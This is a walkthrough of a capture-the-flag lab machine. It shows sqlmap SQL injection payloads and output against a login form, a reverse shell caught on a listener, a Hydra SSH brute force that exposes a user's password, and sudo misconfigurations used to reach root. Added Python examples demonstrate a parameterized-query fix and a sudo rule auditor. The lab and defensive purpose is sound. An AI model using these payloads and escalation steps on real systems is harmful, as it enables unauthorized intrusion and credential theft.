Once we have the .zip, we copy it to the environment where we will start hacking the machine and run the following.
unzip showtime.zip
It unpacks the archive, and then we deploy the machine as follows.
bash auto_deploy.sh showtime.tar
Info:
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
So when we are done hacking it, we press Ctrl+C and the machine is removed so that no leftover files remain.
Port scan
Info:
If we open port 80 we see a normal page, but if we go to the login and try default credentials we will see that it does not work, so we try a very basic SQL injection.
And we will see this:
We see that it works, so we will carry out a SQL injection.
sqlmap
We capture the login request by submitting ordinary credentials such as admin:admin, intercept it with BurpSuite, and save it to a request.txt file like this:
request.txt
Info:
We see that it worked and we get the SQL databases, so now we will list the tables in the database called users.
Info:
We see that there is only one table, called usuarios; now we will list the columns of that table to see the information it holds.
Info:
We see several credentials in that table, so we try them over SSH, but with no luck; however, if we use for example the following credentials on the web login page:
We will see the following:
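The login is injectable because the `usuario` field is concatenated into the SQL text. The following is an added example, not code from the original page or the machine: a constructed SQLite stand-in for the `users.usuarios` table (the `contraseña` column is spelled `contrasena` here, values are placeholders), the string-built query beside its parameterized fix, and a boolean payload in the style sqlmap reported, with MySQL's `#` comment swapped for `-- ` so SQLite drops the password clause the same way.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the machine's users.usuarios table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE usuarios (usuario TEXT, contrasena TEXT)")
    db.executemany("INSERT INTO usuarios VALUES (?, ?)",
                   [("admin", "placeholder-admin-pw"), ("joe", "placeholder-joe-pw")])
    return db


def login_vulnerable(db, usuario, contrasena):
    """Builds the query by string concatenation: the POST fields become SQL text."""
    q = (f"SELECT usuario FROM usuarios WHERE usuario = '{usuario}' "
         f"AND contrasena = '{contrasena}'")
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_fixed(db, usuario, contrasena):
    """Same query, parameterized: the driver binds the values, so a quote is just data."""
    q = "SELECT usuario FROM usuarios WHERE usuario = ? AND contrasena = ?"
    row = db.execute(q, (usuario, contrasena)).fetchone()
    return row[0] if row else None


# Payload shaped like sqlmap's boolean test for `usuario`, adapted to SQLite's
# `-- ` comment; `NOT 8838=8839` is true, and the comment removes the password check.
PAYLOAD = "admin' OR NOT 8838=8839-- "


def demo():
    """Returns who each login function authenticates as for the same inputs."""
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, PAYLOAD, "wrong"),        # 'admin'
        "fixed": login_fixed(db, PAYLOAD, "wrong"),                  # None
        "fixed_valid": login_fixed(db, "joe", "placeholder-joe-pw"),  # 'joe'
    }


if __name__ == "__main__":
    print(demo())
```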
Escalate user www-data
We see that we can run python3 commands, so we do the following to generate a reverse shell.
Before sending it we start a listener:
Now we click Ejecutar Comando so it sends the shell; if we go back to our listener we will see the following:
Now we will sanitize the shell.
Shell sanitization (TTY)
Escalate user joe
If we go to the /tmp folder we will see the following:
Info:
We read the file .hidden_text.txt, in which we will see the following:
We see that everything is in uppercase, so we convert it all to lowercase and run an SSH brute-force attack with the list of users present on the system.
Hydra
users.txt
We run the following to convert it to lowercase:
pass.txt
Info:
We see that we obtained the credentials of user joe, so we connect via SSH as follows.
SSH
We enter chittychittybangbang as the password and we see that we are in as that user.
Escalate user luciano
If we run sudo -l we will see the following:
We see that we can run the posh binary as user luciano, so we do the following:
Info:
With this we become that user.
Escalate Privileges
If we run sudo -l we will see the following:
We see that we can run the script script.sh as root, but it lives in our /home, so we can delete the script, recreate it with whatever content we want and run it as root. We do the following:
Now we create the same file, but with this content:
script.sh
And we run it:
Info:
Now we run it as follows:
Info:
With this we will see that we are root, so we have finished the machine.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 11:34 CET
Nmap scan report for 172.17.0.2
Host is up (0.000029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:9a:9f:b3:17:be:3d:2e:12:05:0f:a4:61:c3:b3:76 (ECDSA)
|_ 256 69:8f:5c:4f:14:b0:4d:b6:b7:59:34:4d:b9:03:40:75 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: cs
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:40:59 /2025-03-09/
[11:40:59] [INFO] parsing HTTP request from 'request.txt'
[11:40:59] [INFO] testing connection to the target URL
[11:40:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:40:59] [INFO] testing if the target URL content is stable
[11:41:00] [INFO] target URL content is stable
[11:41:00] [INFO] testing if POST parameter 'usuario' is dynamic
[11:41:00] [WARNING] POST parameter 'usuario' does not appear to be dynamic
[11:41:00] [INFO] heuristic (basic) test shows that POST parameter 'usuario' might be injectable (possible DBMS: 'MySQL')
[11:41:00] [INFO] testing for SQL injection on POST parameter 'usuario'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:41:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:41:00] [WARNING] reflective value(s) found and filtering out
[11:41:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:41:00] [INFO] testing 'Generic inline queries'
[11:41:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:41:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://172.17.0.2/login_page/home.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[11:41:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:41:01] [INFO] POST parameter 'usuario' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --string="DE")
[11:41:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:41:01] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:41:01] [INFO] POST parameter 'usuario' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[11:41:01] [INFO] testing 'MySQL inline queries'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:41:01] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:41:01] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:41:11] [INFO] POST parameter 'usuario' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:41:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:41:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:41:11] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:41:11] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:41:11] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[11:41:12] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'usuario' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 350 HTTP(s) requests:
---
Parameter: usuario (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usuario=admin' OR NOT 8838=8838#&contrase%C3%B1a=admin
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: usuario=admin' AND GTID_SUBSET(CONCAT(0x7170716b71,(SELECT (ELT(2407=2407,1))),0x7176787171),2407)-- QPsJ&contrase%C3%B1a=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: usuario=admin' AND (SELECT 1600 FROM (SELECT(SLEEP(5)))RZVn)-- bLjg&contrase%C3%B1a=admin
---
[11:41:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.6
[11:41:12] [INFO] fetching database names
[11:41:12] [INFO] retrieved: 'mysql'
[11:41:12] [INFO] retrieved: 'information_schema'
[11:41:12] [INFO] retrieved: 'performance_schema'
[11:41:12] [INFO] retrieved: 'sys'
[11:41:12] [INFO] retrieved: 'users'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[11:41:12] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 11:41:12 /2025-03-09/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:42:24 /2025-03-09/
[11:42:24] [INFO] parsing HTTP request from 'request.txt'
[11:42:24] [INFO] resuming back-end DBMS 'mysql'
[11:42:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usuario (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usuario=admin' OR NOT 8838=8838#&contrase%C3%B1a=admin
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: usuario=admin' AND GTID_SUBSET(CONCAT(0x7170716b71,(SELECT (ELT(2407=2407,1))),0x7176787171),2407)-- QPsJ&contrase%C3%B1a=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: usuario=admin' AND (SELECT 1600 FROM (SELECT(SLEEP(5)))RZVn)-- bLjg&contrase%C3%B1a=admin
---
[11:42:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.6
[11:42:24] [INFO] fetching database names
[11:42:24] [INFO] starting 5 threads
[11:42:24] [INFO] resumed: 'sys'
[11:42:24] [INFO] resumed: 'information_schema'
[11:42:24] [INFO] resumed: 'users'
[11:42:24] [INFO] resumed: 'mysql'
[11:42:24] [INFO] resumed: 'performance_schema'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[11:42:24] [INFO] fetching tables for database: 'users'
[11:42:24] [INFO] retrieved: 'usuarios'
Database: users
[1 table]
+----------+
| usuarios |
+----------+
[11:42:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 11:42:24 /2025-03-09/
listening on [any] 7777 ...
connect to [192.168.5.28] from (UNKNOWN) [172.17.0.2] 44748
$ whoami
whoami
www-data
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Check the dimensions of our terminal on the host
stty size
# Resize the terminal with the appropriate values
stty rows <ROWS> columns <COLUMNS>
cd /tmp
ls -la
total 20
drwxrwxrwt 1 root root 4096 Mar 9 07:54 .
drwxr-xr-x 1 root root 4096 Mar 9 07:33 ..
-rw-r--r-- 1 root root 894 Jul 22 2024 .hidden_text.txt
-rw-r--r-- 1 www-data www-data 206 Mar 9 07:54 temp_script.py
drwx------ 2 mysql mysql 4096 Jul 22 2024 tmp.w3E3JvWoeD
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-09 12:03:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 234 login tries (l:3/p:78), ~4 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: joe password: chittychittybangbang
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
ssh joe@<IP>
Matching Defaults entries for joe on 16a18efc4706:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joe may run the following commands on 16a18efc4706:
(luciano) NOPASSWD: /bin/posh
sudo -u luciano posh
luciano@16a18efc4706:/home/joe$ whoami
luciano
Matching Defaults entries for luciano on 16a18efc4706:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User luciano may run the following commands on 16a18efc4706:
(root) NOPASSWD: /bin/bash /home/luciano/script.sh
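The root escalation above works only because the sudo rule points at a file inside a directory the invoking user owns. As an added example (not code from the page or the machine), this audit parses `sudo -l` output like the one just shown against a constructed owner/mode map standing in for stat(), and flags every entry whose command or argument path the user can modify or replace through a writable parent directory; FS_FIXED shows the same rule after moving the script to a root-owned directory.

```python
import posixpath
import re

# Constructed sample: the `sudo -l` output this page shows for user luciano.
SUDO_L_LUCIANO = """\
Matching Defaults entries for luciano on 16a18efc4706:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty
User luciano may run the following commands on 16a18efc4706:
    (root) NOPASSWD: /bin/bash /home/luciano/script.sh
"""

# Constructed stand-in for stat(): path -> (owner, mode). luciano owning
# /home/luciano is what allows deleting and recreating script.sh.
FS_MACHINE = {
    "/bin": ("root", 0o755), "/bin/bash": ("root", 0o755),
    "/home/luciano": ("luciano", 0o750), "/home/luciano/script.sh": ("root", 0o644),
}
# Same rule after relocating the script to a root-owned directory (hypothetical fix).
FS_FIXED = {
    "/bin": ("root", 0o755), "/bin/bash": ("root", 0o755),
    "/opt": ("root", 0o755), "/opt/script.sh": ("root", 0o755),
}

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:(?P<nopw>NOPASSWD):\s*)?(?P<cmd>/\S.*)$")


def parse_entries(sudo_l_text):
    """Yield (runas, nopasswd, tokens) for each command line of `sudo -l` output."""
    for line in sudo_l_text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            yield m.group("runas"), m.group("nopw") is not None, m.group("cmd").split()


def writable_by(user, path, fs):
    """Owner with the write bit set, or world-writable (group bits ignored here)."""
    owner, mode = fs.get(path, (None, 0))
    return bool((owner == user and mode & 0o200) or mode & 0o002)


def controllable(user, path, fs):
    """The file itself is writable, or its directory is (delete + recreate)."""
    return writable_by(user, path, fs) or writable_by(user, posixpath.dirname(path), fs)


def risky_entries(user, sudo_l_text, fs):
    """Entries whose command or argument paths the invoking user can alter."""
    risky = []
    for runas, nopw, tokens in parse_entries(sudo_l_text):
        bad = [t for t in tokens if t.startswith("/") and controllable(user, t, fs)]
        if bad:
            risky.append({"runas": runas, "nopasswd": nopw,
                          "command": " ".join(tokens), "controllable": bad})
    return risky


if __name__ == "__main__":
    print(risky_entries("luciano", SUDO_L_LUCIANO, FS_MACHINE))
```

Note that joe's `(luciano) NOPASSWD: /bin/posh` rule would pass this check: there the problem is that the target is itself a shell, not that its path is writable.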